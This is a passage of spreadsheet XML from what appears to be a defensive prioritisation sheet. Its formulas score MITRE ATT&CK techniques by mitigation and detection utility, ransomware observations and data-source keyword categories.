      <c r="T336" s="57" t="s">
        <v>1177</v>
      </c>
      <c r="U336" s="57">
        <v>18</v>
      </c>
      <c r="V336" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.30476171428571436</v>
      </c>
      <c r="W336" s="37">
        <v>31</v>
      </c>
      <c r="X336" s="37">
        <v>0.56363600000000003</v>
      </c>
      <c r="Y336" s="37">
        <v>0.56363600000000003</v>
      </c>
      <c r="Z336" s="37">
        <v>2</v>
      </c>
      <c r="AA336" s="37">
        <v>0.02</v>
      </c>
      <c r="AB336" s="37">
        <v>0.02</v>
      </c>
      <c r="AC336" s="37"/>
      <c r="AD336" s="50" t="s">
        <v>1067</v>
      </c>
      <c r="AE336" s="37" t="str" cm="1">
        <f t="array" ref="AE336">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD336)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF336" s="37">
        <v>332</v>
      </c>
      <c r="AG336" s="37" t="str" cm="1">
        <f t="array" ref="AG336">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD336)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH336" s="37">
        <v>332</v>
      </c>
      <c r="AI336" s="37" t="str" cm="1">
        <f t="array" ref="AI336">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD336)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ336" s="37">
        <v>332</v>
      </c>
      <c r="AK336" s="37" t="str" cm="1">
        <f t="array" ref="AK336">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD336)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL336" s="37">
        <v>332</v>
      </c>
      <c r="AM336" s="37" t="str" cm="1">
        <f t="array" ref="AM336">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD336)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN336" s="37">
        <v>0</v>
      </c>
      <c r="AO336" s="37">
        <v>0</v>
      </c>
      <c r="AP336" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ336" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>179.30943942857149</v>
      </c>
      <c r="AR336" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS336" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT336" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU33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37" spans="1:47" ht="34">
      <c r="A337" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B337" s="37">
        <f t="shared" si="5"/>
        <v>133.30000000000001</v>
      </c>
      <c r="C337" s="37" t="s">
        <v>1178</v>
      </c>
      <c r="D337" s="50" t="s">
        <v>1170</v>
      </c>
      <c r="E337" s="37" t="s">
        <v>1179</v>
      </c>
      <c r="F337" s="37">
        <v>1</v>
      </c>
      <c r="G337" s="37">
        <v>1</v>
      </c>
      <c r="H337" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I337" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J337" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K337" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L337" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M337" s="37">
        <v>0</v>
      </c>
      <c r="N337" s="56">
        <v>0</v>
      </c>
      <c r="O337" s="56">
        <v>0</v>
      </c>
      <c r="P337" s="56">
        <v>0</v>
      </c>
      <c r="Q337" s="56">
        <v>0</v>
      </c>
      <c r="R337" s="57"/>
      <c r="S337" s="57">
        <v>0</v>
      </c>
      <c r="T337" s="57"/>
      <c r="U337" s="57">
        <v>0</v>
      </c>
      <c r="V337" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W337" s="37">
        <v>0</v>
      </c>
      <c r="X337" s="37">
        <v>0</v>
      </c>
      <c r="Y337" s="37">
        <v>0</v>
      </c>
      <c r="Z337" s="37">
        <v>0</v>
      </c>
      <c r="AA337" s="37">
        <v>0</v>
      </c>
      <c r="AB337" s="37">
        <v>0</v>
      </c>
      <c r="AC337" s="37"/>
      <c r="AD337" s="50" t="s">
        <v>1180</v>
      </c>
      <c r="AE337" s="37" t="str" cm="1">
        <f t="array" ref="AE337">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD337)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF337" s="37">
        <v>333</v>
      </c>
      <c r="AG337" s="37" t="str" cm="1">
        <f t="array" ref="AG337">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD337)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH337" s="37">
        <v>333</v>
      </c>
      <c r="AI337" s="37" t="str" cm="1">
        <f t="array" ref="AI337">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD337)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ337" s="37">
        <v>333</v>
      </c>
      <c r="AK337" s="37" t="str" cm="1">
        <f t="array" ref="AK337">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD337)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL337" s="37">
        <v>333</v>
      </c>
      <c r="AM337" s="37" t="str" cm="1">
        <f t="array" ref="AM337">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD337)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN337" s="37">
        <v>0</v>
      </c>
      <c r="AO337" s="37">
        <v>0</v>
      </c>
      <c r="AP337" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ337" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>44.433333333333337</v>
      </c>
      <c r="AR337" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS337" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT337" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU33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38" spans="1:47" ht="17">
      <c r="A338" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B338" s="37">
        <f t="shared" si="5"/>
        <v>471.13314233333341</v>
      </c>
      <c r="C338" s="37" t="s">
        <v>1181</v>
      </c>
      <c r="D338" s="50" t="s">
        <v>1170</v>
      </c>
      <c r="E338" s="37" t="s">
        <v>1182</v>
      </c>
      <c r="F338" s="37">
        <v>1</v>
      </c>
      <c r="G338" s="37">
        <v>1</v>
      </c>
      <c r="H338" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I338" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J338" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K338" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L338" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M338" s="37">
        <v>0</v>
      </c>
      <c r="N338" s="56">
        <v>0</v>
      </c>
      <c r="O338" s="56">
        <v>1</v>
      </c>
      <c r="P338" s="56">
        <v>0</v>
      </c>
      <c r="Q338" s="56">
        <v>0</v>
      </c>
      <c r="R338" s="57" t="s">
        <v>1183</v>
      </c>
      <c r="S338" s="57">
        <v>8</v>
      </c>
      <c r="T338" s="57" t="s">
        <v>1177</v>
      </c>
      <c r="U338" s="57">
        <v>18</v>
      </c>
      <c r="V338" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.25238080952380954</v>
      </c>
      <c r="W338" s="37">
        <v>26</v>
      </c>
      <c r="X338" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Y338" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Z338" s="37">
        <v>1</v>
      </c>
      <c r="AA338" s="37">
        <v>0.01</v>
      </c>
      <c r="AB338" s="37">
        <v>0.01</v>
      </c>
      <c r="AC338" s="37"/>
      <c r="AD338" s="50" t="s">
        <v>1184</v>
      </c>
      <c r="AE338" s="37" t="str" cm="1">
        <f t="array" ref="AE338">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD338)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF338" s="37">
        <v>334</v>
      </c>
      <c r="AG338" s="37" t="str" cm="1">
        <f t="array" ref="AG338">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD338)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH338" s="37">
        <v>334</v>
      </c>
      <c r="AI338" s="37" t="str" cm="1">
        <f t="array" ref="AI338">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD338)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ338" s="37">
        <v>334</v>
      </c>
      <c r="AK338" s="37" t="str" cm="1">
        <f t="array" ref="AK338">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD338)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL338" s="37">
        <v>334</v>
      </c>
      <c r="AM338" s="37" t="str" cm="1">
        <f t="array" ref="AM338">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD338)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN338" s="37">
        <v>0</v>
      </c>
      <c r="AO338" s="37">
        <v>0</v>
      </c>
      <c r="AP338" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ338" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>157.0443807777778</v>
      </c>
      <c r="AR338" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS338" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT338" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU33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39" spans="1:47" ht="17">
      <c r="A339" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B339" s="37">
        <f t="shared" si="5"/>
        <v>453.38539500000007</v>
      </c>
      <c r="C339" s="37" t="s">
        <v>1185</v>
      </c>
      <c r="D339" s="50" t="s">
        <v>1170</v>
      </c>
      <c r="E339" s="37" t="s">
        <v>1186</v>
      </c>
      <c r="F339" s="37">
        <v>1</v>
      </c>
      <c r="G339" s="37">
        <v>1</v>
      </c>
      <c r="H339" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I339" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J339" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K339" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L339" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M339" s="37">
        <v>0</v>
      </c>
      <c r="N339" s="56">
        <v>0</v>
      </c>
      <c r="O339" s="56">
        <v>0</v>
      </c>
      <c r="P339" s="56">
        <v>0</v>
      </c>
      <c r="Q339" s="56">
        <v>0</v>
      </c>
      <c r="R339" s="57" t="s">
        <v>1187</v>
      </c>
      <c r="S339" s="57">
        <v>5</v>
      </c>
      <c r="T339" s="57" t="s">
        <v>1188</v>
      </c>
      <c r="U339" s="57">
        <v>20</v>
      </c>
      <c r="V339" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.238095</v>
      </c>
      <c r="W339" s="37">
        <v>25</v>
      </c>
      <c r="X339" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Y339" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Z339" s="37">
        <v>0</v>
      </c>
      <c r="AA339" s="37">
        <v>0</v>
      </c>
      <c r="AB339" s="37">
        <v>0</v>
      </c>
      <c r="AC339" s="37"/>
      <c r="AD339" s="50" t="s">
        <v>1067</v>
      </c>
      <c r="AE339" s="37" t="str" cm="1">
        <f t="array" ref="AE339">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD339)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF339" s="37">
        <v>335</v>
      </c>
      <c r="AG339" s="37" t="str" cm="1">
        <f t="array" ref="AG339">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD339)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH339" s="37">
        <v>335</v>
      </c>
      <c r="AI339" s="37" t="str" cm="1">
        <f t="array" ref="AI339">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD339)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ339" s="37">
        <v>335</v>
      </c>
      <c r="AK339" s="37" t="str" cm="1">
        <f t="array" ref="AK339">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD339)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL339" s="37">
        <v>335</v>
      </c>
      <c r="AM339" s="37" t="str" cm="1">
        <f t="array" ref="AM339">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD339)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN339" s="37">
        <v>0</v>
      </c>
      <c r="AO339" s="37">
        <v>0</v>
      </c>
      <c r="AP339" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ339" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>151.12846500000003</v>
      </c>
      <c r="AR339" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS339" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT339" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU33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40" spans="1:47" ht="51">
      <c r="A340" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B340" s="37">
        <f t="shared" si="5"/>
        <v>678.90450571428573</v>
      </c>
      <c r="C340" s="37" t="s">
        <v>1189</v>
      </c>
      <c r="D340" s="50" t="s">
        <v>1170</v>
      </c>
      <c r="E340" s="37" t="s">
        <v>1190</v>
      </c>
      <c r="F340" s="37">
        <v>1</v>
      </c>
      <c r="G340" s="37">
        <v>1</v>
      </c>
      <c r="H340" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I340" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J340" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K340" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L340" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M340" s="37">
        <v>0</v>
      </c>
      <c r="N340" s="56">
        <v>0</v>
      </c>
      <c r="O340" s="56">
        <v>0</v>
      </c>
      <c r="P340" s="56">
        <v>0</v>
      </c>
      <c r="Q340" s="56">
        <v>1</v>
      </c>
      <c r="R340" s="57" t="s">
        <v>1191</v>
      </c>
      <c r="S340" s="57">
        <v>18</v>
      </c>
      <c r="T340" s="57" t="s">
        <v>1192</v>
      </c>
      <c r="U340" s="57">
        <v>24</v>
      </c>
      <c r="V340" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.40476171428571428</v>
      </c>
      <c r="W340" s="37">
        <v>42</v>
      </c>
      <c r="X340" s="37">
        <v>0.76363599999999998</v>
      </c>
      <c r="Y340" s="37">
        <v>0.76363599999999998</v>
      </c>
      <c r="Z340" s="37">
        <v>1</v>
      </c>
      <c r="AA340" s="37">
        <v>0.01</v>
      </c>
      <c r="AB340" s="37">
        <v>0.01</v>
      </c>
      <c r="AC340" s="37"/>
      <c r="AD340" s="50" t="s">
        <v>1193</v>
      </c>
      <c r="AE340" s="37" t="str" cm="1">
        <f t="array" ref="AE340">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD340)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF340" s="37">
        <v>336</v>
      </c>
      <c r="AG340" s="37" t="str" cm="1">
        <f t="array" ref="AG340">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD340)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH340" s="37">
        <v>336</v>
      </c>
      <c r="AI340" s="37" t="str" cm="1">
        <f t="array" ref="AI340">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD340)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ340" s="37">
        <v>336</v>
      </c>
      <c r="AK340" s="37" t="str" cm="1">
        <f t="array" ref="AK340">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD340)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL340" s="37">
        <v>336</v>
      </c>
      <c r="AM340" s="37" t="str" cm="1">
        <f t="array" ref="AM340">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD340)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN340" s="37">
        <v>0</v>
      </c>
      <c r="AO340" s="37">
        <v>0</v>
      </c>
      <c r="AP340" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ340" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>226.30150190476192</v>
      </c>
      <c r="AR340" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS340" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT340" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU34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41" spans="1:47" ht="102">
      <c r="A341" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="B341" s="37">
        <f t="shared" si="5"/>
        <v>2383.2333333333331</v>
      </c>
      <c r="C341" s="37" t="s">
        <v>1194</v>
      </c>
      <c r="D341" s="50" t="s">
        <v>1195</v>
      </c>
      <c r="E341" s="37"/>
      <c r="F341" s="37">
        <v>2</v>
      </c>
      <c r="G341" s="37">
        <v>2</v>
      </c>
      <c r="H341" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I341" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J341" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K341" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L341" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M341" s="37">
        <v>1</v>
      </c>
      <c r="N341" s="56">
        <v>0</v>
      </c>
      <c r="O341" s="56">
        <v>9</v>
      </c>
      <c r="P341" s="56">
        <v>28</v>
      </c>
      <c r="Q341" s="56">
        <v>16</v>
      </c>
      <c r="R341" s="57" t="s">
        <v>1196</v>
      </c>
      <c r="S341" s="57">
        <v>12</v>
      </c>
      <c r="T341" s="57" t="s">
        <v>1197</v>
      </c>
      <c r="U341" s="57">
        <v>21</v>
      </c>
      <c r="V341" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.56666666666666665</v>
      </c>
      <c r="W341" s="37">
        <v>33</v>
      </c>
      <c r="X341" s="37">
        <v>0.6</v>
      </c>
      <c r="Y341" s="37">
        <v>0.6</v>
      </c>
      <c r="Z341" s="37">
        <v>53</v>
      </c>
      <c r="AA341" s="37">
        <v>0.53</v>
      </c>
      <c r="AB341" s="37">
        <v>0.53</v>
      </c>
      <c r="AC341" s="37"/>
      <c r="AD341" s="50" t="s">
        <v>1198</v>
      </c>
      <c r="AE341" s="37" t="str" cm="1">
        <f t="array" ref="AE341">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD341)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF341" s="37">
        <v>337</v>
      </c>
      <c r="AG341" s="37" t="str" cm="1">
        <f t="array" ref="AG341">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD341)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH341" s="37">
        <v>337</v>
      </c>
      <c r="AI341" s="37" t="str" cm="1">
